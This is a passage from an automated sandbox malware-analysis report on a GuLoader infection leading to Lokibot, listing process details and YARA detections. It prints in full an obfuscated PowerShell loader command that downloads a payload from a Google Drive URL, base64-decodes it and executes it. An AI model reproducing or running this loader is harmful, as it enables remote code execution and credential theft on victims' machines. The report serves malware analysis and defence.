                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bjrgning Indicerede afskrkkelsesvaabnenes Halvfabrikatas Myosuture Skilteskrift Pensils #>;$Ammoniacs='Befragters';<#Avilion kendall kicking #>;$Attesterende=$host.PrivateData;If ($Attesterende) {$Jernbanelinier++;}function Preeliminator($Amagerhylde){$Drukkenbolten=$Chaussure+$Amagerhylde.Length-$Jernbanelinier;for( $Getling=5;$Getling -lt $Drukkenbolten;$Getling+=6){$Nordfljs180+=$Amagerhylde[$Getling];}$Nordfljs180;}function Glederens($Floraer207){ & ($Eftertragtelsers) ($Floraer207);}$Spisefrikvarteret=Preeliminator 'GelatMPhotooSdsupzss ori O belQu etlRenataamphi/ Tilh5Ve an.Not r0Udson Ind c(AfgasWSanitiLabi nHarpudptomaoBetraw Pl nsA.cum VedblNN,nmeT stfo so.si1 a ne0Opium.Jetti0foraa;,nman b,lthWModtai K otn ern6Ratba4Tynds;Koldk Supe xlegac6Cellm4 Triu;Rolni VinderMlescvMods,:per c1Parti2 Pre 1et al.Savne0Edgew)Belly TrickGS.cceeHeltic AfgrkOleogoVentr/Blods2 .isq0S,uth1Froko0S nsi0konde1Selek0Batus1Udkry DetonFH spiiVillarGenn eBlubbfCiffeoSalatxLabba/Midte1 Ver,2 V rg1 Over.Kem i0 oni ';$Melton=Preeliminator ' HandUUniveSAfs nEUnexprFrema- Blk AJackfgBr gaedekanN UflytAdnex ';$Tessituras160=Preeliminator 'FristhKvi dtB dbatLow,ip.recasLejei:E ter/Amati/S.mlidPret rSpeediHandlvSyzyge Pati.Ove sg Ri.goDemisoPelvigUnclelTwatceUnsu .Exo,ecUnco oFiskemMi mo/Mongcusja,kcAgrar? De.meMrkatx .ackp FantohkkerrConvetOblig=NulpudSstteoJordewEnaarnReceplSkinnoGla sa OpsadK mmu&Cir uiSv dsdMerin=Drift1NondeQSlutmt Tyk OKonsekIdesvBGyno JPagodW andgLStikpLintenxNonde3.erveD LiniwClonkBWall.CDivisg Au,oRGl tsLSpina8NonciQSy ecZzairiaTaxam0BonnnhKendeYSynenUPa il0MackiwSyndrtSundaSUdskrj Gnis7Syvaa ';$Reskaleringen=Preeliminator 'S,rig>Yu ca ';$Eftertragtelsers=Preeliminator 'BeaveiEforeeAttacX,ekto ';$Amazonernes='Chromophoric';$Cogida='\Reebok.Dia';Glederens (Preeliminator 'Lazur$SvmmegProatlK ledoCatalbRealiaBulbolDa ks:Cam oV RecreOvervrListedVaskoe Di inWa,ersThorphUdv siMattesSenegtS amnoMavefrIndfriKornfs prudk Raile ReoxsVerds=Polem$FusenedimminHal,fv Intr:Bj.rgaPseudpH micpBekradMajesaS efftOrakla ortr+blin $ReawoC BlinoBudmagDestii CoundMemoraElekt ');Glederens (Preeliminator 'Jingl$Mayb gGadenlStikkoMust b KnapaCourtlPligt:CroaptAn ihrHeroleParadbHy era K ncnHete eJanifn Lsni=Sente$ ConsT Mysteoutbls Sikks PseuiPatentSta iuAlb.tr,utokaPachosLevef1 M,mo6Fer d0 Chem.UnshisSta dp.bseslStockiScourtBr sk( Hete$someoRtoot.etros s AnalklokalaKreatl .epteUnfurrBarduiSarconStiklgAntife Lab n Lat,) anga ');Glederens (Preeliminator 'Flyde[S.empN I.laeNaziptDinor.YesteSForneerigorrKennevDybsiiHortecSaliceScootPTabacoFacahiHairin ma gt ,entMApplia Lil nTreadaDisd gSamlee CommrEmbub]Bitte:Cycli:GastrSFeltheHeatecA foru rnearAflsei OngotFie dy .odsPAvle rAndreo BlegtCastioop,racStyreoMu tilSeism Pres =Udhal Opspa[ BhutN Afk.e Knitt Udga.,artjS ropdeBundlcResiluS rivrEks.mi tiftT rsuyPaperPHenver Huxto MulitBoy,ooForskc UnceoKsnehlAdrenTVar,iyLat.rpFib seCythe],ermi:Aaben:Alei TR diolGrftesSolhj1 smad2Tubel ');$Tessituras160=$trebanen[0];$saurels=(Preeliminator 'algo,$Hepp.gRearrlSweenoAllerbD oleaAfgifLEfter:F lberBadgeeBaadfP,uperEKarritOpkl,iKrsantElledi RestO LiqunAmin ASekunR I.teYDiplo=Tran NMag,eE MisiWputre-NatarONd inbForldjR ulmeBasisCMidenTNonn. Rec.nSCac.cyCapriSO,idetPo,ygEsmaasMArcha.Flo snD pliEDemiotSt ns.Stam wB nebeSkrumbRep ocUdgralglitti Sm kE eklaN P.antvaler ');Glederens ($saurels);Glederens (Preeliminator ' Unsc$Limi.Rungare.edsppAmbuleSurintM,untiStrint,ovediPartso BalanCas,faLarrur MillyPerni.Em erHSkbneeTitteaP,otodRoyale Blksr ,ills rga[Omkr $IndfdM OvereRa iul fsbtHocklomousin krue]Asper=torre$ .icrSpamfipBlu pikontrsUndereCrossfSerabrSyntei CharkuratuvEddicaAh ldr ,rantkompoeEny lrHypaceNonqutFaglo ');$Band=Preeliminator 'Petau$nykalRDykkee St.rp MadoeCautitMyrici BlomtEpigri PreaoSt ernBasilaOsterrBankrydomes.Til gDFolkeoRemovwIn imn.krivlAf ilo Kursa Fa ldKnaldFBerthiOpfanlablace nat(Vir e$P.rseTRhinoeSammesArccosOverdiPangetx loguRegnorConyzaNon.osSva m1Pr nt6 Pell0Surre,Legul$ KawcBS unklCo.ntaOrdfjdSeriesAlette ,kanlC rollSvolveForeprTreski U ar) Hy,e ';$Bladselleri=$Verdenshistoriskes;Glederens (Preeliminator 'vitam$U irkGFarveLechoiOR litB eriAOvervLMishm:ProviUAkamndGalacSMonogTDi raiR,stbl etiLUdskreOverstaglyc=Dephl(Ge yrtAgerjEFremssPaupeTSacri-FiskepCl ngAsurpaTSchizhBlot Fdsel$ B atbBallylGj rdafrancDTh.otSMicroESoci,LB,uxiLTricoEAppriRFj,rdiMal,i)Smls ');while (!$Udstillet) {Glederens (Preeliminator 'Urede$St.ejg MetolCou soBeskfb SlgeaD athlgasap: ashlITelfonOversv TirsaNo malSsonaiBrug dAlthoeTailopSt kne Physn Sagas,rissiE bezo.accin rugsbl ck= Torv$ KelptArkairUnupbu Tet.e va.e ') ;Glederens $Band;Glederens (Preeliminator 'KoordSCykeltClarkaLiebhr MarktTusin-BrnehSDelkllRen,eeRe peeAbstrpUnco Intui4 Moan ');Glederens (Preeliminator 'm,tth$ NipsgNot rl Cai.o LoesbReearaBoplsl nden:EclipUGalocd lomssNo,imtGrafiiOverllMisfolHete eAn,latSydam=Afsti(PlaneT Amuzec,rsosGummitElevc-Ind rPStrafaOvah.twowi,h pent Permi$ OverB Wal l varmaAut cdHainasR,sbeecardilPrecol ProleEmissrSu.eriDolph)S urp ') ;Glederens (Preeliminator ' Kay $Pu slgChervlclodpoKlingb Geoma pklalS,rre:GalliASoricnRomertOve pi Duehk Un.evDe,tea IncorSkriniBeforafjerbtMor.i= Z,nt$UgenngEnv,ilKonseo,ibiabCensuam strl Bl,n: Sam.Tearwio Noniu W rksFrem lKirkeiOp.arnbetingHuser+Jul s+ igma%Nas e$ D.tetUnshrr,aandeAltanbGeneraadre nHandeeWintenLitho. pfancPerfoo prruKomman .gentH,nli ') ;$Tessituras160=$trebanen[$Antikvariat];}$Getlingndsunknes198=318869;$Negrita=32225;Glederens (Preeliminator 'Mo,fa$UddykgPresulInteroKollebOverlaNema l equi:UdbliPOverloCocond oldaa rounr ReligTrammeCalor Coxc= Co s ProfeGSheareE imytP odu-KultuCrulleoMisaln,iggit yline ombenPrecut Erig umy,d$ ko pB Hem l rminaI,dekd.ravlsSp.cieMaa el CabolCac ee kolrShtchiGoka ');Glederens (Preeliminator 'Hobna$Deka,gConf.lbe,vroDybs,bJessiaBerewl desi:TilstShor,euArlanpHyptre PerirCur ecOpvasa.osadrArgumg Fed,o IdiosStupe Ener=Margi Geofy[LapidS adeay elarsKo eatBev eePrehumlamia. ,alaCZornuo Un enBega vDiploe iscrNeddytRetsh]Balan: Skif:FedteFErnrirI,eogoUndermCre yBUnm.caErgoms ConseAver 6Re re4TavleSfugletchancrFdreliMessenPassagExpon(Nstfo$ EnnaPDi tio Sigtd ,oraaD vnsr MahjgCloyleSkatt)gulds ');Glederens (Preeliminator 'R pub$ RibbgToothlFugleo St ab HoflaForstlMeddl:por,vTTvrstoMashmn.edaieTrucul Sm,aeWishej ngreBefootadgans.abar C,ika= Groo minar[ Dra.S tuthyPseuds Teletsamree StrumLu er.overdTSv neeEcle xMediot Gill.SobreEs.norn ReficSata,o N.tadTatteiF nsenFimengLatir].eign: itro:Cyke.A GlemSFiskeClg dgI umynI,lind. TotaGSphagepseudtEneboSBestvtDybb rmelleiB,quan ensagDimid(Buder$Ag veSTimokuParafp UdgieTvan rKumulc gejlaMumblrfrivogKo meoWaspisUnder)Bru e ');Glederens (Preeliminator 'Iri e$TamergTu,nelAsepso okumbUntenaF derlTi li:Prut PFo ndfr.emig p in=Rygep$ pa.tTTirehoVkstrnBaronehirudlPaviseVelrvjSnuereVan,ltRukbasTr si.OmstnsAffutuOutspbUnpeds Veint Brutr Ruski Kas,nUncaug Lowl(Masse$ForldGOver.eIldfut ,ttalDeseciSkra nBighogImprinstuehdCha.cs.bbatuOvercnBondukStrepnSubtre Mon,s apit1Opbe.9Taeni8Inter,Ti,st$CatnaNPh ageSwinkgko.terRobiniR.lent InveaTmrer)Sky d ');Glederens $Pfg;"
                                        Imagebase:0x170000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2721566180.0000000008430000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2710566286.000000000565A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2721776675.0000000008B75000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:01:18:37
                                        Start date:02/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:01:18:54
                                        Start date:02/10/2024
                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                                        Imagebase:0xa80000
                                        File size:59'904 bytes
                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2948258092.00000000042ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        No disassembly